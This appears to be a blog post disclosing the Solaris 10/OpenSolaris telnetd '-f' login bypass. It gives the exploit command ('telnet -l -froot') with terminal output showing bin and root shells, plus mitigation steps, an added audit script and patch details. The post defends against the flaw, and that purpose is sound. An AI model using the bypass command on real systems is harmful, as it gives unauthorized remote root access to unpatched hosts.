UPDATE: SunAlert 102802 and IDR/ISR official patches for this issue have been released (details at the end of this post).

Ooops, how embarrassing, Solaris 10/OpenSolaris has a very silly stupid vulnerability in in.telnetd/login that has come to light.

Essentially, you can get access to a remote Solaris 10/OpenSolaris system (which has telnet enabled) without any prompts or fancy tricks by simply using the "-f<username>" option:


[ruler : ~]$ telnet -l -fbin devon
Trying 129.156.87.95...
Connected to devon.
Escape character is '^]'.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
[devon : ~]$ id
uid=2(bin) gid=2(bin)
[devon : ~]$

This works for any user on the system. You can even gain root access if root access is not restricted to the console only (CONSOLE=/dev/console commented out in /etc/default/login):


[ruler : ~]$ telnet -l -froot devon
Trying 129.156.87.95...
Connected to devon.
Escape character is '^]'.
Last login: Mon Feb 12 14:01:51 from sr1-egmp-12.UK.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
[devon : ~]# id
uid=0(root) gid=0(root)
[devon : ~]# grep /dev/console /etc/default/login
# CONSOLE=/dev/console
[devon : ~]#

It's quite amazing how long it's taken this issue to surface, especially considering how trivial it is. You can see details of the offending lines of code in this PDF.

That said, why are you still using telnet anyway? Haven't you been warned about the dangers of using telnet? You should have abandoned telnet years ago.

What's more, if you're running a new install (not an upgrade) of Solaris 10 update 3 (11/06) you would have had to deliberately open yourself up to this vulnerability as Solaris 10u3 is the first release of Solaris to be "Secure by default", which means in.telnetd is DISABLED.

So, without further ado, disable telnet access on your Solaris 10 and later hosts NOW:


[devon : ~]# svcs telnet
STATE STIME FMRI
online 14:20:21 svc:/network/telnet:default
[devon : ~]# svcadm disable telnet
[devon : ~]# svcs telnet
STATE STIME FMRI
disabled 14:27:42 svc:/network/telnet:default
[devon : ~]#
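
To check a host for both conditions described above (telnet enabled in SMF, and CONSOLE= commented out in /etc/default/login), here is an added audit script; it is not part of the original post. The function names and verdict words are its own, and it assumes POSIX grep and awk (on Solaris 10, put /usr/xpg4/bin first in PATH).

```shell
#!/bin/sh
# Added example (not from the original post): audit a host for the two
# conditions the post describes. Function names and verdict words are this
# example's own. Assumes POSIX grep/awk (/usr/xpg4/bin first in PATH).

# Read `svcs` output on stdin; print the STATE of the telnet service,
# or "absent" when no telnet FMRI is listed.
telnet_state() {
    awk '$3 ~ /^svc:\/network\/telnet:/ { print $1; found = 1; exit }
         END { if (!found) print "absent" }'
}

# Succeed only when FILE has an uncommented CONSOLE=<device> line, i.e.
# direct root logins are restricted to that device.
console_restricted() {
    grep -Eq '^[[:space:]]*CONSOLE=[^[:space:]]' "$1" 2>/dev/null
}

# $1 = telnet state, $2 = login defaults file. Prints one verdict word.
verdict() {
    case "$1" in
        disabled|absent) echo "ok"; return 0 ;;
    esac
    if console_restricted "$2"; then
        echo "exposed"        # telnet is on; root is limited to the console
    else
        echo "exposed-root"   # telnet is on and root is not console-only
    fi
}

if command -v svcs >/dev/null 2>&1; then
    # Real host: the same `svcs telnet` query used in the post.
    state=$(svcs telnet 2>/dev/null | telnet_state)
    echo "telnet audit: $(verdict "$state" /etc/default/login)"
else
    # No SMF here: run on constructed sample input instead.
    demo=$(mktemp)
    printf '# CONSOLE=/dev/console\n' > "$demo"
    state=$(printf 'online 14:20:21 svc:/network/telnet:default\n' | telnet_state)
    echo "demo audit: $(verdict "$state" "$demo")"
    rm -f "$demo"
fi
```

Anything other than "ok" means telnet should be disabled with svcadm as shown above, or the patches installed.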

You have been warned.

UPDATE: SunAlert 102802 and IDR/ISR official patches for this issue have been released:
  • SPARC Platform
    • Solaris 10 IDR125456-01 (Requires: 120068-01 - SunOS 5.10: in.telnetd Patch)
      120068-02 - SunOS 5.10: in.telnetd Patch
  • x86 Platform
    • Solaris 10 IDR125457-01 (Requires: 120069-01 - SunOS 5.10_x86: in.telnetd Patch)
      120069-02 - SunOS 5.10_x86: in.telnetd Patch

As this is a security issue, the official IDR/ISR patches are available direct to the public from https://sunsolve.sun.com/tpatches, via the links provided above.

Congratulations to Alan Hargreaves and team for such an amazingly quick turnaround - I've never seen a bug fixed this quickly in all my time at Sun.

Please install these NOW if you use telnet. Official patches will follow shortly.